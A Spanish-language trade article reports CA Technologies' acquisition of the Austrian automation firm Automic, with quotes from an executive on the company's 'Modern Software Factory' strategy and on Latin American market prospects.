El 19 de enero pasado, CA Technologies anunció que completó la adquisición de Automic Holding GmbH, una empresa fundada en Austria especializada en procesos de negocio y software de automatización de TI, la cual, de acuerdo con lo informado por la compañía en ese momento, “agrega nuevas capacidades de automatización y orquestación habilitadas para la nube en toda la cartera de CA y aumenta su alcance global, además de ofrecer a los clientes “una solución integral que complementa las inversiones tecnológicas existentes y aborda los desafíos de la automatización en toda la empresa”.

“Lo que Automic proporciona es una habilidad para empoderar cualquier negocio y mercado vertical para lograr más agilidad y control de los procesos que son críticos para su negocio y entorno y también para simplificar la complejidad de esos procesos. Lo hacemos con nuestra tecnología de automatización y lo hemos estado haciendo por más de 30 años”, dijo Wilson a este medio. “Internamente y para el beneficio de nuestros clientes, hemos proporcionado algunas integraciones inmediatas a varios de los productos actuales dentro de la cartera de CA para mejorar las inversiones actuales en otros de nuestros productos en los que la automatización proporciona un valor complementario”, explicó.

Al ser consultado sobre cómo queda posicionada CA en el mercado gracias a la plataforma en la nube de Automic, el entrevistado aseveró que esta adquisición “es una de las más importantes que CA ha hecho en más de diez años y es fundamental en el futuro a corto plazo de la empresa”. Y agregó: “Creo que es una brecha crítica que se cierra teniendo en cuenta que CA va a comercializar con la llamada Fábrica Moderna de Software”.

De acuerdo con la explicación del ejecutivo, un componente clave de la Fábrica Moderna de Software es tener un marco de automatización que lo une todo y a cada producto que forma parte de esta estructura, que tiene cuatro núcleos: la capacidad de proporcionar agilidad, conocimientos y análisis, de tener una estrategia de seguridad general y un marco de automatización que permite la integración sin fisuras y la transformación digital dentro de la organización. “Esta adquisición aborda la brecha del núcleo dentro de la fábrica que era fundamental para CA y nos va a posicionar como una fuerza dominante en los próximos años”, aseguró. “Tenemos la estrategia correcta para ser básicamente el jugador más poderoso en lo que respecta al avance de un mercado basado en las aplicaciones”.

Asimismo, en lo que respecta a la integración de la analítica en tiempo real de Automic en el enfoque de plataforma de extremo a extremo de CA, el ejecutivo dijo que estas capacidades “ofrecen esencialmente mayor agilidad empresarial con soluciones que pasan de la automatización de tareas centrada en TI a la automatización inteligente centrada en el negocio y la orquestación.”

Impacto en Latnoamérica

Wilson mostró conocimiento de nuestra región, en la cual ve una oportunidad de crecimiento potencial muy grande a medida que el mercado de la automatización siga madurando. “Lo que es interesante sobre algunos de los mercados aquí es que están un poco atrasados en términos de innovación y en la toma de riesgos con respecto a algunas otras partes en América del Norte y Europa, donde la gente está más arriba en la escala de madurez en términos de adoptar nuevas tecnologías y nuevas estrategias, como DevOps e Internet de Cosas e incluso iniciativas de Big Data”, analizó. “Esto se debe en parte a que hay mucha dependencia de los bancos y las telcos en el sistema central y en las tecnologías heredadas que han estado utilizando durante años: mainframes, SAP, Oracle y muchos otros que no quieren cambiar demasiado porque sus negocios dependen de ellos y hay allí un riesgo percibido”, aseguró.

El entrevistado aseguró, además, que la mayoría de los clientes con los CA esta trabajando comparte la sensación de que no pueden esperar más para comenzar a hacer estos cambios para poder continuar siendo relevantes en el futuro. “Hoy en día las empresas tienen que ser proactivas y un buen socio comercial para el negocio, con el fin de ser capaz de responder en forma más rápida y ágil. Y eso no sólo tiene que ver con sus aplicaciones digitales, móviles y de cara al cliente, sino que también tienen que serlo con sus sistemas básicos. Curiosamente, la automatización lo permite. Por eso el mensaje ha sido tan bien recibido. Los clientes dicen: ‘no podemos esperar más, ¿cómo puedes ayudarnos?’, Y nosotros en CA / Automic tenemos esa tecnología habilitadora única para hacerlo”, destacó.